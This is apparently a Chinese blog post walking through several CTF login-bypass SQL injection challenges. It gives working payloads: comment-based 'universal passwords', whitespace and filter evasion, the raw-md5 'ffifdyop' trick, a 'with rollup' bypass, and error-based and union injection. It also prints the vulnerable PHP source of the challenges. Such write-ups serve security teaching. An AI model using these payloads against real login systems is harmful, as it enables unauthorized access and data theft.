login窗口for mysql_CTF| SQL注入之login界面

最新推荐文章于 2023-08-22 20:50:40 发布
最新推荐文章于 2023-08-22 20:50:40 发布
阅读量470 收藏 1
点赞数
文章标签: login窗口for mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39892800/article/details/113327490
版权

SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。

万能密码—very easy

题目入口:http://lab1.xseclab.com/sqli2_32 ... c31550b60/index.php

题目来源:hacking lab inject 01~

101601juyd33fgdomo3s2o.png

very easy.png (2.98 KB, 下载次数: 35)

2017-10-10 10:16 上传

源代码有提示:

101632zpf196hdgyhfddyb.png

!.png (1.79 KB, 下载次数: 23)

2017-10-10 10:16 上传

万能密码登录语句构造:

select * from admin where username='admin'and 1=1 #' and password='123456'

OR

select * from admin where username='admin'or 1 #' and password='123456'

或者不需要admin

select * from admin where username='1'or 1 or 1 #' and password='123456'

还可以用#来注释

select * from admin where username='admin'#' and password='123456'

万能密码— easy

题目入口:http://redtiger.labs.overthewire.org/level2.php

题目来源:RedTigers Hackit Level 2 Simple login-bypass

做题密码:4_is_not_random

构造语句:

username=1&password=1'or'1'or'1&login=Login

101910f7ayda4jxa31a43y.png

login.png (1.8 KB, 下载次数: 21)

2017-10-10 10:19 上传

万能密码— not than easy

题目入口: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

题目来源:实验吧,不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!

102009ivar19071bpzb98e.png

easy.png (18.17 KB, 下载次数: 24)

2017-10-10 10:20 上传

常规方式使用万能密码,发现'没有被过滤,or,--+,#被过滤。

102047l8m7u5uzlbm1oriz.png

beiguolv.png (78.34 KB, 下载次数: 26)

2017-10-10 10:20 上传

假设后台sql查询语句为:

select * from user where username='$user' and password='$pass'

构造payload:

username=reborn'='&password=reborn'='

102214ql44x5b5gi3o35s4.png

000.png (9.85 KB, 下载次数: 23)

2017-10-10 10:22 上传

select * from user where username='reborn'='' and password='reborn'=''

username='reborn'返回值为0,相当于false,然后0=''的结果为1,相当于true。

所以注入语句相当于:

select * from user where 1 and 1

万能密码— little hard ?

题目入口:http://123.59.52.228:1515/route.php?act=index

题目来源:2017年全国大学生信息安全竞赛的web题。

102355d8hh5vbztbfs4zin.png

your hat.png (19.48 KB, 下载次数: 22)

2017-10-10 10:23 上传

提交的时候,返回包有提示这么一个sql语句:

select count(*) from t_info where username = '1' or nickname = '1'

' 转义 \

\ 转义 \\

" 转义 \"

空格被过滤:但'可以转义掉原本的'

name=or 1 #'&submit=check

select count(*) from t_info where username = 'or1#\' or nickname = 'or1#\'

用%09代替空格,%09是制表符的URL编码 。

name=or%091%09#'&submit=check

select count(*) from t_info where username = 'or 1 #\' or nickname = 'or 1 #\'good job

跟随302跳转。

102650z0ls7cxsd7obdq7f.png

tiaozhuan.png (2.15 KB, 下载次数: 29)

2017-10-10 10:26 上传

万能密码— md5($pass,true)

题目入口:http://web.jarvisoj.com:32772/

题目来源:jarvis oj,Login:需要密码才能获得flag哦。

本题是一个登录页面。

102717myyzz3zqzb3jdjjd.png

页面.png (1.01 KB, 下载次数: 36)

2017-10-10 10:27 上传

通过burp抓包拦截,返回包有提示:

102747y6136bf6buydbuko.png

返回包.png (73.79 KB, 下载次数: 27)

2017-10-10 10:27 上传

Hint: "select * from `admin` where password='".md5($pass,true)."'"

* md5(string,raw)*

string 必需。规定要计算的字符串。

raw 可选。规定十六进制或二进制输出格式:

•  TRUE - 原始 16 字符二进制格式

•FALSE - 默认。32 字符十六进制数如果md5计算后的值经过hex转成字符串后为 ”or’xxx’这样的字符串,则拼接后构成的语句为:

select * from `admin` where password=''or'xxx'

下面提供两个payload:

content: 129581926211651571912466741651878684928

hex: 06da5430449f8f6f23dfc1276f722738

raw: ?T0D??o#??'or'8.N=?

content: ffifdyop

hex: 276f722736c95d99e921722cf9ed621c

raw: 'or'6蒥欓!r,b

类似题目:

题目入口:http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/

题目来源:hacking lab inject 09~

看到源代码password='".md5($_GET['pwd'], true),就知道这道题和题目3的解法是一致的。

http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&pwd=ffifdyop

万能密码— with rollup

题目入口: http://ctf5.shiyanbar.com/web/pcat/index.php

题目来源:实验吧

访问链接是登录页面:

103042mmemqxntb99quk79.png

万能页‘’.png (17.01 KB, 下载次数: 24)

2017-10-10 10:30 上传

查看网页源代码有提示:

103143c79lp9gol4gyyr9n.png

ts.png (1.99 KB, 下载次数: 31)

2017-10-10 10:31 上传

访问:http://ctf5.shiyanbar.com/web/pcat/source.txt 得到题目源代码。

error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {

echo '

'."
";

echo ''."
";

echo ''."
";

echo ''."
";

echo '

'."
";

echo ''."
";

die;

}

function AttackFilter($StrKey,$StrValue,$ArrReq){

if (is_array($StrValue)){

$StrValue=implode($StrValue);

}

if (preg_match("/".$ArrReq."/is",$StrValue)==1){

print "水可载舟,亦可赛艇!";

exit();

}

}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";

foreach($_POST as $key=>$value){

AttackFilter($key,$value,$filter);

}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");

if (!$con){

die('Could not connect: ' . mysql_error());

}

$db="XXXXXX";

mysql_select_db($db, $con);

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";

$query = mysql_query($sql);

if (mysql_num_rows($query) == 1) {

$key = mysql_fetch_array($query);

if($key['pwd'] == $_POST['pwd']) {

print "CTF{XXXXXX}";

}else{

print "亦可赛艇!";

}

}else{

print "一颗赛艇!";

}

mysql_close($con);

?>

从源代码得出,注入点在uname这个位置上,$filter没有过滤掉or

注入成功要满足几个条件:

1.mysql_num_rows($query) == 1 即查询返回的结果行数为1

2.$key['pwd'] == $_POST['pwd'] 即查询返回的结果与POST发送的pwd值相同

解题:

group by pass with rollup 的技巧

mysql> select user from users group by user;

+---------+

| user    |

+---------+

| 1337    |

| admin   |

| gordonb |

| pablo   |

| smithy  |

+---------+

5 rows in set

mysql> select user from users group by user with rollup;

+---------+

| user    |

+---------+

| 1337    |

| admin   |

| gordonb |

| pablo   |

| smithy  |

| NULL    |

+---------+

6 rows in set

可以发现,在加上with roll up之后,返回pass最后一行多了一个NULL。当我们POST的pass为空,即可满足$key['pwd'] == $_POST['pwd']条件。

如何让返回的结果只取最后一行呢?

因为过滤了,所以无法使用limit 5,1这样的语法

可以使用limit 1 offset 5

mysql> select user from users group by 1 with rollup limit 1 offset 5;

+------+

| user |

+------+

| NULL |

+------+

1 row in set

所以最终 payload 如下,2为遍历出来的值

uname=' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=

万能密码— 程序逻辑

题目入口: http://ctf5.shiyanbar.com/web/5/index.php

题目来源:实验吧,程序逻辑问题

本题源代码:http://ctf5.shiyanbar.com/web/5/index.txt

welcome to simplexue

if($_POST[user] && $_POST[pass]) {

$conn = mysql_connect("********, "*****", "********");

mysql_select_db("phpformysql") or die("Could not select database");

if ($conn->connect_error) {

die("Connection failed: " . mysql_error($conn));

}

$user = $_POST[user];

$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";

$query = mysql_query($sql);

if (!$query) {

printf("Error: %s\n", mysql_error($conn));

exit();

}

$row = mysql_fetch_array($query, MYSQL_ASSOC);

//echo $row["pw"];

if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {

echo "

Logged in! Key:**************

";

}

else {

echo("

Log in failure!

");

}

}

?>

首先可以发现user处存在注入点,并且会回显错误信息,第一个想到的是报错注入。

user=admin'and (extractvalue(1,concat(0x7e,(select pw from php where user ='admin' limit 0,1),0x7e)))#&pass=111

结果密码并不是admin/111。

user=admin'and (extractvalue(1,concat(0x7e,(select pw from phpformysql.php limit 0,1),0x7e)))#&pass=111

结果提示:

103939l2a5jykel5jx4ljg.png

error.png (3.09 KB, 下载次数: 27)

2017-10-10 10:39 上传

既然是程序逻辑漏洞,然就继续看代码吧。

if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {

echo "

Logged in! Key:**************

";

}

判断sql查询返回的值和$pass做比较。strcasecmp比较两个字符串,且不区分大小写,相等返回0。

既然user存在注入,我们可以让返回的结果为任何值,只要等于我们输入pass的md5值。

如:reborn的md5加密的值为5ce3c6e5c3f84bdc0f45148adfd16ae6

因此我们可以构造payload:

user='union select '5ce3c6e5c3f84bdc0f45148adfd16ae6'#&pass=reborn

结果:

104114caypyv5hnfekvpy0.png

jieguo.png (3.9 KB, 下载次数: 25)

2017-10-10 10:41 上传

104134o4bq163h04hphm62.jpg

640.webp.jpg (54.75 KB, 下载次数: 40)

2017-10-10 10:41 上传

weixin_39892800
关注
mysql 登录框注入_CTF| SQL注入login界面
weixin_34609222的博客
01-19 2558
SQL注入CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1609
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
webbug php盲注,CTF-WEB 一个登录框SQL盲注
weixin_36012215的博客
03-28 232
标签下的内容 没办法 又去学习一下“美丽的汤”Beautifulsoup 解析网页首先放上一段测试代码:# -*- coding:utf-8 -*-from bs4 import BeautifulSoupimport requestssession = requests.Session()paramsPost = {"password":"1","username":"admin"}hea...
Bugku-web题,ctf模拟题sql注入神奇的登陆框
嘟的博客
09-30 1584
title: Bugku-web题,ctf模拟题sql注入神奇的登陆框 tags: web破解 categories: 渗透测试 这是Bugku-web题,地址为http://123.206.87.240:9001/sql/ 登陆网站,打开burp进行截断,账号密码随便打,burp截取后进行保存。 使用sqlmap自动注入,可以发现数据库版本,数据库名 使用sqlmap自动注入,发现表...
CG CTF-Web-SQL注入
feng的博客
09-06 378
SQL注入1 进入题目之后先看源码,进行代码审计 <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(S
CTF/CTF练习平台-login1【sql约束攻击】
Sp4rkW的博客
09-14 4369
原题内容: http://47.93.190.246:49163/ flag格式:SKCTF{xxxxxxxxxxxxxxxxx} hint:SQL约束攻击 约束攻击这里不做详解了,详解见我的博客基于约束的SQL攻击 【电脑环境mysql实测漏洞已经修补】 题目提示很明显了,这里直接几个截图解释下做题思路: 提示admin存在,尝试admin...
万能用户名原理分析
最新发布
weixin_52963334的博客
08-22 608
万能用户名
flask mysql sql注入_SQL注入进阶-Flask中转SQLMAP案例
weixin_39797693的博客
02-06 209
前言在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?一道CTF题的思考先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,...
mysql 南邮ctf_南邮CTF平台WEB题writeup
weixin_39596739的博客
02-07 2611
https://cgctf.nuptsast.com/login1.签到题F12查看网页源代码就有flag2.md5 collision附上题目给的源代码md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo ...
if语句格式模拟用户登录操作
sullte的博客
05-16 900
import java.util.Scanner; public class Deno13 { public static void main(String[] args) { //创建输入对象 Scanner sc = new Scanner(System.in); //提示并输入 第一种方式: System.out.println("请输入用户名"); String useaName =sc.next(...
SimpleLogin:简单登录系统
05-14
简单登录 下载并安装: 启动MongoDB并创建“ SimpleLogin”数据库。 下载仓库并打开应用程序文件夹 从'simpleLogin'打开GitBash 运行$ npm install 运行$ npm start 转到 登记 登录 登出 完毕 API路由 * GET/register: used to render register.pug * GET/login: used to render login.pug * POST/register: used to get signup/register * POST/login: used to login as a regitered user * GET/verifyCredentials: used to test the validation Token
(功能实现)关于统计数据库读出的条数,而且这些数据又要用
wcg83的专栏
11-03 737
刚刚遇到一个问题,到网上找找发现也有人问==引用=开始=======================================================================  如果ado.net不支持recordset,那么原来在ASP象这样的语句         select   *   from   UserInfo   where   UserName=User
第十届全国大学生信息安全竞赛-线上赛 write up(持续更新)
热门推荐
csu_vc的博客
09-17 2万+
0x00 WEBPHP execise -web150 这是一道分值150的web题,打开题目链接之后,看到题目界面 可以看到有一处输入的地方可以输入PHP语句 尝试执行以下phpinfo(),这里解释下,phpinfo是一个运行指令,目的为显示php服务器的配置信息。 phpinfo()输出 PHP 当前状态的大量信息,包含了 PHP 编译选项、启用的扩展、PHP 版本、服务器信息
SQL学习及习题集-(xuesql.cn and http://zh.sqlzoo.net/)
null
08-07 3023
SQL学习及习题集-(xuesql.cn and http://zh.sqlzoo.net/) 1.SELECT 查询 请列出所有电影的ID,名称和出版国 SELECT title,id,'美国' as country FROM movies 2.条件查询(constraints) SELECT column, another_column, … FROM mytable WHERE condit...
在线就能用的 SQL 练习平台我给你找好了!
Oner.wv的专栏
03-13 412
作者|Rocky0429来源| Python空间大家好,我是 Rocky0429,一个最近正在学习 SQL 的蒟蒻...在看完了某 《xxx 必知...
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 3086
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3579
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&amp;passwor...
ctf线下赛mysql密码_某CTF线下赛某CMS SQL注入分析
weixin_36046580的博客
01-21 306
前段时间,参加一次CTF线下攻防赛,用的是某cms,里面有一个SQL注入漏洞,挺有意思,记录一下分析心得。系统后台登陆处存在SQL注入,在后台登陆用户名处加个’测试一下:发现报错,十有八九存在SQL注入看下/admin/login.php内容:在42和43行发现对user和password进过fl_value()和fl_html()处理,然后送入check_login(),跟进check_logi...
BugkuCTF之web题之这是一个神奇的登陆框
A_dmin的博客
12-09 1万+
BugkuCTF之web题之这是一个神奇的登陆框 打开网页之后发现: 随便输入账号和密码出现: 那就开始寻找注入点吧,输入0’发现还是: 输入0" 发现报错: 确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现: 说明有两列。 输入 0" union select database(),2# ,得到库名: 继续输入 0" union select table_na...
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值